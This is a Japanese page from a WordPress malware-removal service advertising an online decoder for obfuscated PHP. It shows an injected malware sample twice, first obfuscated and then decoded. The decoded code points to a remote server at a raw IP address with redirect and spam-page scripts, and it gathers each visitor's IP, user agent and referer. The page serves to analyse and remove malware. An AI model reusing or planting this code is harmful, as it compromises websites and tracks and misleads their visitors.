Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; $oOooOO = 'z0823_7'; $oOooOOoO = "http://198.204.238.74/z0823_7/"; $oOooOOoOO = isset($_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[37]]) && $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[37]] !== $O[8] . $O[13] . $O[13] ? $O[15] . $O[4] . $O[4] . $O[9] . $O[11] . $O[62] . $O[63] . $O[63] : $O[15] . $O[4] . $O[4] . $O[9] . $O[62] . $O[63] . $O[63]; $oOoooOOoOO = $_SERVER[$O[29] . $O[28] . $O[26] . $O[32] . $O[28] . $O[37] . $O[30] . $O[52] . $O[32] . $O[29] . $O[33]]; $ooOOoooOOoOO = $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[41] . $O[34] . $O[37] . $O[30]]; $ooOOOoooOOoOO = $_SERVER[$O[35] . $O[41] . $O[35] . $O[52] . $O[37] . $O[28] . $O[44] . $O[39]]; $ooOOOOoooOOOoOO = $_SERVER[$O[37] . $O[28] . $O[29] . $O[48] . $O[28] . $O[29] . $O[52] . $O[50] . $O[36] . $O[51] . $O[28]]; $ooOOOOoooOOOOoOO = $oOooOOoOO . $ooOOoooOOoOO . $oOoooOOoOO; $oooOOOOoooOOOooOO = $oOooOOoO . $O[63] . $O[7] . $O[24] . $O[12] . $O[10] . $O[4] . $O[10] . $O[59] . $O[9] . $O[15] . $O[9]; $ooooOOOOoooOOOooO = $oOooOOoO . $O[63] . $O[25] . $O[10] . $O[9] . $O[59] . $O[9] . $O[15] . $O[9]; $ooooOOOOoooOOOooOoo = $oOooOOoO . $O[63] . $O[16] . $O[6] . $O[25] . $O[9] . $O[59] . $O[9] . $O[15] . $O[9]; $oooooOOoooOOOoooOoo = $oOooOOoO . $O[63] . $O[1] . $O[8] . $O[3] . $O[12] . $O[11] . $O[59] . $O[9] . $O[15] . $O[9]; $ooooooooOOOOoooOOoooOO = $oOooOOoO . $O[63] . $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[9] . $O[15] . $O[9]; $ooooooOoOoooOOOooo[$O[6] . $O[11] . $O[2] . $O[3] . $O[52] . $O[10] . $O[14] . $O[2] . $O[24] . $O[4]] = strtolower(isset($_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[32] . $O[37] . $O[28] . $O[29] . $O[52] . $O[36] . $O[40] . $O[28] . $O[50] . $O[30]]) ? $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[32] . $O[37] . $O[28] . $O[29] . $O[52] . $O[36] . $O[40] . $O[28] . $O[50] . $O[30]] : ''); $oooOoOOooOoooOOOoOoOoOoOoO = strtolower(isset($_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[32] . $O[37] . $O[28] . $O[29] . $O[52] . $O[36] . $O[40] . $O[28] . $O[50] . $O[30]]) ? $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[32] . $O[37] . $O[28] . $O[29] . $O[52] . $O[36] . $O[40] . $O[28] . $O[50] . $O[30]] : ''); $ooooooOoOoooOOOooo[$O[15] . $O[4] . $O[4] . $O[9] . $O[52] . $O[6] . $O[11] . $O[2] . $O[3] . $O[52] . $O[10] . $O[14] . $O[2] . $O[24] . $O[4]] = $oooOoOOooOoooOOOoOoOoOoOoO; $oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[29] . $O[28] . $O[39] . $O[28] . $O[29] . $O[28] . $O[29]]) ? $_SERVER[$O[41] . $O[30] . $O[30] . $O[35] . $O[52] . $O[29] . $O[28] . $O[39] . $O[28] . $O[29] . $O[28] . $O[29]] : ''; $ooooOOOOoooOOOoooOOO = $_SERVER[$O[29] . $O[28] . $O[51] . $O[34] . $O[30] . $O[28] . $O[52] . $O[36] . $O[38] . $O[38] . $O[29]]; $ooooooOoOoooOOOooo[$O[7] . $O[9]] = $ooooOOOOoooOOOoooOOO; $ooooooOoOoooOOOooo[$O[3] . $O[2] . $O[13] . $O[2] . $O[3] . $O[2] . $O[3]] = $oooOOOooOoooOOOooooOoOoOoOoO; ?>
<?php global $O; $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,"; $oOooOO = 'z0823_7'; $oOooOOoO = "http://198.204.238.74/z0823_7/"; $oOooOOoOO = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://"; $oOoooOOoOO = $_SERVER["REQUEST_URI"]; $ooOOoooOOoOO = $_SERVER["HTTP_HOST"]; $ooOOOoooOOoOO = $_SERVER["PHP_SELF"]; $ooOOOOoooOOOoOO = $_SERVER["SERVER_NAME"]; $ooOOOOoooOOOOoOO = $oOooOOoOO . $ooOOoooOOoOO . $oOoooOOoOO; $oooOOOOoooOOOooOO = "http://198.204.238.74/z0823_7//indata.php"; $ooooOOOOoooOOOooO = "http://198.204.238.74/z0823_7//map.php"; $ooooOOOOoooOOOooOoo = "http://198.204.238.74/z0823_7//jump.php"; $oooooOOoooOOOoooOoo = "http://198.204.238.74/z0823_7//words.php"; $ooooooooOOOOoooOOoooOO = "http://198.204.238.74/z0823_7//robots.php"; $ooooooOoOoooOOOooo["user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); $oooOoOOooOoooOOOoOoOoOoOoO = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); $ooooooOoOoooOOOooo["http_user_agent"] = $oooOoOOooOoooOOOoOoOoOoOoO; $oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $ooooOOOOoooOOOoooOOO = $_SERVER["REMOTE_ADDR"]; $ooooooOoOoooOOOooo["ip"] = $ooooOOOOoooOOOoooOOO; $ooooooOoOoooOOOooo["referer"] = $oooOOOooOoooOOOooooOoOoOoOoO;
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.